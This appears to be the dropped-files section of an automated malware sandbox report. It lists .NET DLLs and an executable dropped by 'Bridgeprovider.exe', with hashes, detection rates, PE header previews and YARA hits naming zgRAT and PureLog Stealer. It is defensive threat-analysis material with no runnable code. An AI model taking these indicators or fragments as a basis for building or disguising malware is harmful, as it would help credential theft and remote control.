                                                                                                                                                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39936
                                                                                                                                                                                                  Entropy (8bit):5.660491370279985
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                                                                                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                                                                                                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                                                                                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                                                                                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34304
                                                                                                                                                                                                  Entropy (8bit):5.618776214605176
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                                                                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                                                                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                                                                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                                                                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
Process:C:\Windows\Bridgeprovider.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):69632
Entropy (8bit):5.932541123129161
Encrypted:false
SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 50%
Preview: MZ/PE header ("This program cannot be run in DOS mode"), sections .text, .rsrc, .reloc; remaining preview bytes are non-printable
Process:C:\Windows\Bridgeprovider.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):46592
Entropy (8bit):5.870612048031897
Encrypted:false
SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:3601048DFB8C4A69313A593E74E5A2DE
SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 5%
Preview: MZ/PE header ("This program cannot be run in DOS mode"), sections .text, .rsrc, .reloc; remaining preview bytes are non-printable
Process:C:\Windows\Bridgeprovider.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):39936
Entropy (8bit):5.629584586954759
Encrypted:false
SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 17%
Preview: MZ/PE header ("This program cannot be run in DOS mode"), sections .text, .rsrc, .reloc; remaining preview bytes are non-printable
Process:C:\Windows\Bridgeprovider.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):32256
Entropy (8bit):5.631194486392901
Encrypted:false
SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:D8BF2A0481C0A17A634D066A711C12E9
SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 25%
Preview: MZ/PE header ("This program cannot be run in DOS mode"), sections .text, .rsrc, .reloc; remaining preview bytes are non-printable
Process:C:\Windows\Bridgeprovider.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):41472
Entropy (8bit):5.6808219961645605
Encrypted:false
SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:094DE32070BED60A811D983740509054AD017CE4
SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 17%
Preview: MZ/PE header ("This program cannot be run in DOS mode"), sections .text, .rsrc, .reloc; remaining preview bytes are non-printable
Process:C:\Windows\Bridgeprovider.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):38400
Entropy (8bit):5.699005826018714
Encrypted:false
SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:87765D141228784AE91334BAE25AD743
SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 25%
Preview: MZ/PE header ("This program cannot be run in DOS mode"), sections .text, .rsrc, .reloc; remaining preview bytes are non-printable
Process:C:\Windows\Bridgeprovider.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):40448
Entropy (8bit):5.7028690200758465
Encrypted:false
SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:51B1964F31C557AE8C2B01EA164ABD9F
SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 12%
Preview: MZ/PE header ("This program cannot be run in DOS mode"), sections .text, .rsrc, .reloc; remaining preview bytes are non-printable
Process:C:\Windows\Bridgeprovider.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):28160
Entropy (8bit):5.570953308352568
Encrypted:false
SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
MD5:A4F19ADB89F8D88DBDF103878CF31608
SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                                                                                                                                                                  SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33280
                                                                                                                                                                                                  Entropy (8bit):5.634433516692816
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                                                                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                                                                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                                                                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                                                                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):64000
                                                                                                                                                                                                  Entropy (8bit):5.857602289000348
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                                                                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                                                                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                                                                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                                                                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34816
                                                                                                                                                                                                  Entropy (8bit):5.636032516496583
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                                                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                                                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                                                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                                                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):294912
                                                                                                                                                                                                  Entropy (8bit):6.010605469502259
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                                                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                                                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                                                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                                                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                  Entropy (8bit):5.645950918301459
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Windows\Bridgeprovider.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                                                  Entropy (8bit):6.057993947082715
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                                                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                                                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                                                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 21%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

Process:C:\Windows\Bridgeprovider.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):70144
Entropy (8bit):5.909536568846014
Encrypted:false
SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:E4FA63649F1DBD23DE91861BB39C317D
SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 29%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

Process:C:\Windows\Bridgeprovider.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):36352
Entropy (8bit):5.668291349855899
Encrypted:false
SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:94DA5073CCC14DCF4766DF6781485937
SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 21%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

Process:C:\Windows\Bridgeprovider.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):342528
Entropy (8bit):6.170134230759619
Encrypted:false
SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 50%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

Process:C:\Windows\Bridgeprovider.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):89600
Entropy (8bit):5.905167202474779
Encrypted:false
SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
MD5:06442F43E1001D860C8A19A752F19085
SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 16%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

Process:C:\Windows\Tasks\1.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):3766784
Entropy (8bit):7.8288998084696235
Encrypted:false
SSDEEP:49152:SUZpV+/6tPv1Vjlr1VdlhrnKSiOIwSTLvCGj0oXcR6VQ1oB3RobzRk5A5v4ses:SevbR5ltKSiOIZfC9o63oBKk5A5vD
MD5:BF9DDFDD875FA2BADBE94E88A1FC4214
SHA1:8730687161C402B4586A61968E7BEC1D17B7E29A
SHA-256:8E35B4E95AFF45AC48B79D7359F31CE871B5D952D3C0F51D500929FEE0442D06
SHA-512:B823653024D225B39A609DD844EF203F243A9BDAC1C89FF4EB11C355D09420CEA6EB3B0F713817D65AA506F8F5D0B809EEE3F694F71364D2170403E3980B0BBF
Malicious:true
Yara Hits:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Bridgeprovider.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Bridgeprovider.exe, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 63%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................r9..........9.. ....9...@.. ........................9...........@...................................9.K.....9.p.....................9...................................................... ............... ..H............text....p9.. ...r9................. ..`.rsrc...p.....9......t9.............@....reloc........9......x9.............@..B..................9.....H...................l.............9......................................0..........(.... ........8........E....M...N...).......8H...(.... ....~....{....:....& ....8....(.... ....~....{b...9....& ....8....*(.... ....~....{|...9....& ....8y......0..)....... ........8........E............6...........Z...8....r...ps....z*...... ....~....{q...:....& ....8....8.... ....~....{h...:....& ....8........~....(C...~....(G... ....<.... ....8]...~....:.... ....~....{....:?...& ....84...~.

Process:C:\Windows\Bridgeprovider.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):212
Entropy (8bit):5.708713708020551
Encrypted:false
